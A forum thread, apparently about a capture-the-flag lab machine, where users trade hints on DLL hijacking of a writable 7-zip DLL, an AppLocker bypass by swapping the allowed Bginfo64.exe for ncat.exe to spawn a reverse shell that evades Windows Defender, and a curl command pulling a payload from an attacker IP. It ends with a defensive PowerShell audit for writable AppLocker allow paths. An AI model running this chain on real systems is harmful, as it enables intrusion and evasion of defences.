qwerty173, April 27, 2022 at 3:34 AM

  (April 23, 2022, 09:19 PM) Exa Wrote:
    (April 23, 2022, 07:02 PM) yemacaw863 Wrote:
      (April 23, 2022, 02:53 PM) joeydalips Wrote:
        (April 23, 2022, 01:26 PM) cavour12 Wrote:
          Next step is DLL Hijacking! :D
        Bar the 7-zip DLL on the share drive, which we can write to... any other ideas why it's a DLL hijack? Seems like it's more of a replacement than hijacking, really.
      Refer to https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dll-hijacking for DLL hijacking.
    The second one under "Your own" works.. got the user flag.. But what's next? :cry: This user is a member of ITDep, while ITDep is a member of Account Operators... Tried changing password, creating a new account, adding to other groups, but none work :(
    Any nudge will be appreciated.. thanks

I got code execution too. Did you get a (reverse) shell as ginawild? What payload did you use to get a shell as ginawild? I've been trying for the last hour.

qwerty173, April 27, 2022 at 10:04 AM

How can I bypass AppLocker... I've tried running scans to look for dirs that aren't blocked and got nothing... standard dirs like /windows/temp and /windows/tasks don't work either... this shell is killing me :(

Reply, April 27, 2022 at 11:59 AM

Anyone with the root part?

Reply, April 27, 2022 at 12:11 PM

  (April 27, 2022, 10:04 AM) qwerty173 Wrote:
    How can I bypass AppLocker... I've tried running scans to look for dirs that aren't blocked and got nothing... standard dirs like /windows/temp and /windows/tasks don't work either... this shell is killing me :(

When you run "Get-AppLockerPolicy -effective -xml" you will notice that Bginfo64.exe is allowed. Try replacing that with your own binary as ginawild.

Reply, April 27, 2022 at 5:20 PM

  (April 27, 2022, 03:34 AM) qwerty173 Wrote:
    I got code execution too. Did you get a (reverse) shell as ginawild? What payload did you use to get a shell as ginawild? I've been trying for the last hour.

The payload is proving difficult alright to get a shell back to the user..

___user___, April 28, 2022 at 7:10 AM

How to get the ginawild shell?

Reply, April 28, 2022 at 8:21 AM

  (April 28, 2022, 07:10 AM) ___user___ Wrote:
    How to get the ginawild shell?

I'm still stuck on getting the shell too... I've figured out how to change the bginfo owner and permission set, but it still doesn't let me write to it...

Reply, April 29, 2022 at 8:33 AM

  (April 28, 2022, 01:04 PM) jon01 Wrote:
    (April 27, 2022, 03:18 AM) qwerty173 Wrote:
      (April 26, 2022, 08:15 PM) joeydalips Wrote:
        (April 26, 2022, 05:40 PM) Exa Wrote:
          (April 26, 2022, 11:26 AM) teksius Wrote:
            What DLL did you replace?
          There is only one DLL in that share.
          Take the second "Your own" code sample from https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dll-hijacking#your-own and compile it with x86_64-w64-mingw32-gcc.
          First, try a simple command like "whoami > C:\Test\whoami.txt".
          To upload files, you can use curl in the cmd.
        How do you replace the DLL though? Neither the web nor the BM user appears able to write to the share..
      Curl it to the root of the share and then use copy to copy it into the /shares folder and overwrite it, you mean?
    curl http://10.10.xxx.xxx/7-zip64.dll -o W:\scripts\7-zip64.dll

My 7-zip64.dll does 4 things:
- takeown /f C:\share\Bginfo64.exe
- Grant full privileges on C:\share\Bginfo64.exe to everyone
- Use curl to replace C:\share\Bginfo64.exe with ncat.exe (https://github.com/cyberisltd/NcatPortable)
- Run C:\share\Bginfo64.exe to spawn a reverse shell

It was tricky to find a reverse shell which didn't trigger Windows Defender. This ncat.exe worked for me.

Reply, April 29, 2022 at 1:30 PM

  (April 29, 2022, 10:07 AM) jon01 Wrote:
    (April 22, 2022, 01:05 PM) cavour12 Wrote:
      I tried to exploit BM with an impersonation aspx vb script, but I think it's not allowed by the line <identity impersonate="false" in Web.config, so I think it's a rabbit hole.
    ALSO THIS WE CAN IMPERSONATE USER ;) ;) ;) ;) ;)

Any idea what next? To root the box?

Reply, April 30, 2022 at 6:27 AM

Crack the pfx file password. I noticed that you can't run ps1 files without a digital signature, so that's what I'm trying now. If anyone else has any other information, that would be great.
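Seen from the administrator's side, the weakness the thread keeps circling is an AppLocker Allow path rule that covers a location standard users can write to, so the allowed binary can simply be swapped. The PowerShell audit below is an added example, not something posted in the thread: it reads the effective policy the 12:11 PM reply mentions (Get-AppLockerPolicy -Effective -Xml) and flags Allow path rules for Exe, Dll and Script collections whose target is writable by Everyone, Authenticated Users or Users. The path-variable expansions and the write-rights mask are my assumptions.

```powershell
# Added example (not from the thread): audit the effective AppLocker policy for Allow
# path rules that point at locations a standard user can write to. Such a rule lets
# anyone replace the allowed binary (the thread's C:\share\Bginfo64.exe case).
$policy = [xml](Get-AppLockerPolicy -Effective -Xml)

# AppLocker path variables and their usual expansions (assumed defaults).
# %REMOVABLE% and %HOT% have no fixed expansion, so rules using them are skipped below.
$pathVars = @{
    '%WINDIR%'       = $env:windir
    '%SYSTEM32%'     = Join-Path $env:windir 'System32'
    '%PROGRAMFILES%' = $env:ProgramFiles
    '%OSDRIVE%'      = $env:SystemDrive
}

# Write-like rights only (assumed mask); Modify and FullControl ACEs contain these bits too.
$writeMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'
# Everyone, Authenticated Users, BUILTIN\Users: groups every interactive user belongs to.
$broadSids = 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545'

function Test-BroadWriteAccess([string]$Path) {
    # True when a broad principal holds any write-like right on $Path.
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        if ($broadSids -contains $sid -and (([int]$ace.FileSystemRights -band $writeMask) -ne 0)) {
            return $true
        }
    }
    return $false
}

$collections = $policy.AppLockerPolicy.RuleCollection | Where-Object { $_.Type -in 'Exe', 'Dll', 'Script' }
foreach ($collection in $collections) {
    foreach ($rule in @($collection.FilePathRule) | Where-Object { $_.Action -eq 'Allow' }) {
        $rulePath = $rule.Conditions.FilePathCondition.Path
        $expanded = $rulePath
        foreach ($var in $pathVars.Keys) { $expanded = $expanded -replace [regex]::Escape($var), $pathVars[$var] }
        # "C:\share\*" covers the directory; a plain file path covers that single file.
        $target = $expanded -replace '\\\*$', ''
        if (-not (Test-Path -LiteralPath $target)) { continue }
        if (Test-BroadWriteAccess $target) {
            Write-Warning ("{0} rule '{1}' allows {2}, and {3} is writable by Everyone/Users" -f `
                $collection.Type, $rule.Name, $rulePath, $target)
        }
    }
}
```

Each warning is a rule that should be tightened to a publisher or hash rule, or whose target directory needs its ACL corrected so only administrators can add or replace files there.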